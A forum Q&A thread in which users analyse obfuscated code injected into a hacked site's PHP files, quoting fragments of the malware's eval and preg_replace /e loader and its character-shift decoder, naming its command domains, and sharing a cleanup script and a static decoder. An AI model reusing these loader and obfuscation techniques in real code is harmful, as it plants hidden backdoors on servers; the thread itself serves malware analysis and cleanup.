Hacked Site - Encrypted Code

A few days ago, I noticed that almost all php files on my server are infected with some kind of encrypted code, and almost every file is different. Here is an example from one of the files:

http://pastebin.com/JtkNya5m

Can someone tell me what this code does or how to decode it?

+6
3 answers

You can calculate the values of some variables and start getting your estimates.

    $vmksmhmfuh = 'preg_replace'; //substr($qbrqftrrvx, (44195 - 34082), (45 - 33));
    preg_replace('/(.*)/e', $viwdamxcpm, null); // Calls the function wgcdoznijh()
    $vmksmhmfuh($ywsictklpo, $viwdamxcpm, NULL);

So, the initial goal is to call the wgcdoznijh() function with the payloads in the script; this is done by means of the built-in function call in the preg_replace subject in the expression.

  /* aviewwjaxj */ eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($tbjmmtszkv,$qbrqftrrvx))); /* ptnsmypopp */ 

If you hex-decode the result, you get this:

    if ((function_exists("ob_start") && (!isset($GLOBALS["anuna"])))) {
        $GLOBALS["anuna"] = 1;
        function fjfgg($n) { return chr(ord($n) - 1); }
        @error_reporting(0);
        preg_replace("/(.*)/e", "eval(implode(array_map("fjfgg",str_split("\x25u:f!>!(\x25\x78:!> ...

The above is truncated, but you have another payload as the subject of the new preg_replace call. Again, because of the e modifier, it can execute.

And it uses the callback for array_map to further decode the payload passed to eval.

The payload for eval looks like this (hex-decoded):


That also looks truncated ...

This is as far as I have time for, but if you want to continue, here is a useful URL.

http://ddecode.com/

Good luck.

+7

I found the same code in a Wordpress instance and wrote a short script to remove it from all files:

    <?php
    // Walk every file below the directory this script is placed in
    $directory = new RecursiveDirectoryIterator(dirname(__FILE__));
    $iterator = new RecursiveIteratorIterator($directory);
    foreach ($iterator as $filename => $cur) {
        $contents = file_get_contents($filename);
        // Match the injected prefix by its marker string, its length and the position of its closing ?>
        if (strpos($contents, 'tngmufxact') !== false
            && strlen($contents) > 13200
            && strpos($contents, '?>', 13200) == 13278) {
            echo $filename.PHP_EOL;
            // Cut the injected block off and keep the original file contents
            file_put_contents($filename, substr($contents, 13280));
        }
    }

Just change the string "tngmufxact" to your obfuscated version and everything will be removed automatically.

The length of the obfuscated string may be different - do not test this in your live environment!

Be sure to back up your files before doing this!

+4

I decrypted this script, and it (apart from the obfuscation) is exactly the same as this one: Magento Website Hacked - encryption code in all php files

The URL inside is also the same:

  • 33db9538.com
  • 9507c4e8.com
  • e5b57288.com
  • 54dfa1cb.com

If you are unsure / inexperienced, do not try to execute or decode the code yourself, but get professional help.

In addition: the decoding was performed manually, selecting code fragments and partially executing them (inside a virtual machine - in case something goes wrong).

So basically I repeated this over and over:

  • select hexadecimal strings to get plain text (to find out which functions will be used)
  • always replace eval with echo
  • always replace preg_replace("/(.*)/e", ...) with echo(preg_replace("/(.*)/", ...))

The e at the end of the regular expression means evaluation (i.e. the PHP eval function), so be sure to remove this as well.

In the end, you have several function definitions, and one of them is called via ob_start.

+2
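A static decoder for the transforms the answers above point out, written as an added example and not code from any of the original posts: it resolves the chr((a-b)) arithmetic from the first answer, expands \xNN escapes and applies the fjfgg() shift of chr(ord($n) - 1) without running any PHP, flags preg_replace calls carrying the e modifier, and rewrites eval to echo as the last answer describes. SAMPLE is a constructed fragment shaped like the quoted code, not a real infected file.

```python
import re

# Constructed sample modelled on the fragments quoted in the answers above; the real
# infected files run to thousands of characters, this keeps only their shape.
SAMPLE = (
    'eval(str_replace(chr((257-220)), chr((483-391)), wgcdoznijh($a, $b)));\n'
    'preg_replace("/(.*)/e", "eval(implode(array_map(\\"fjfgg\\",'
    'str_split(\\"\\x25u:f!>!(\\x25\\x78:!>\\"))))", "");\n'
)

CHR_ARITH = re.compile(r"chr\(\((\d+)\s*-\s*(\d+)\)\)")
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{1,2})")
# first argument of preg_replace: a quoted /pattern/modifiers literal
PREG_PATTERN = re.compile(r"""preg_replace\(\s*(["'])(/.*?/[a-zA-Z]*)\1""")

def php_unescape(s):
    """Expand the \\xNN escapes of a PHP double-quoted string; other escapes are left alone."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), s)

def shift_decode(s, delta=-1):
    """Static equivalent of the fjfgg() callback, chr(ord($n) - 1), applied to every character."""
    return "".join(chr(ord(c) + delta) for c in s)

def decode_shifted_literal(escaped):
    """What array_map("fjfgg", str_split("...")) would hand to eval, without executing it."""
    return shift_decode(php_unescape(escaped))

def resolve_chr_arithmetic(src):
    """Replace chr((a-b)) with the character it yields, written as a quoted literal."""
    return CHR_ARITH.sub(lambda m: repr(chr(int(m.group(1)) - int(m.group(2)))), src)

def find_eval_modifier(src):
    """1-based line numbers of preg_replace calls whose pattern carries the e (eval) modifier."""
    hits = []
    for n, line in enumerate(src.splitlines(), 1):
        if any("e" in m.group(2).rsplit("/", 1)[1] for m in PREG_PATTERN.finditer(line)):
            hits.append(n)
    return hits

def neutralize(src):
    """The manual rewrite as a text transform: eval( -> echo( and the e modifier dropped,
    so each decoded stage is printed for inspection instead of executed."""
    def drop_e(m):
        body, mods = m.group(2).rsplit("/", 1)
        return "preg_replace(" + m.group(1) + body + "/" + mods.replace("e", "") + m.group(1)
    return PREG_PATTERN.sub(drop_e, src).replace("eval(", "echo(")
```

Running decode_shifted_literal on the str_split argument quoted in the first answer yields the `$t9e = '$w9 =` prefix of its next stage, which is how the stages can be peeled without ever evaluating them.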
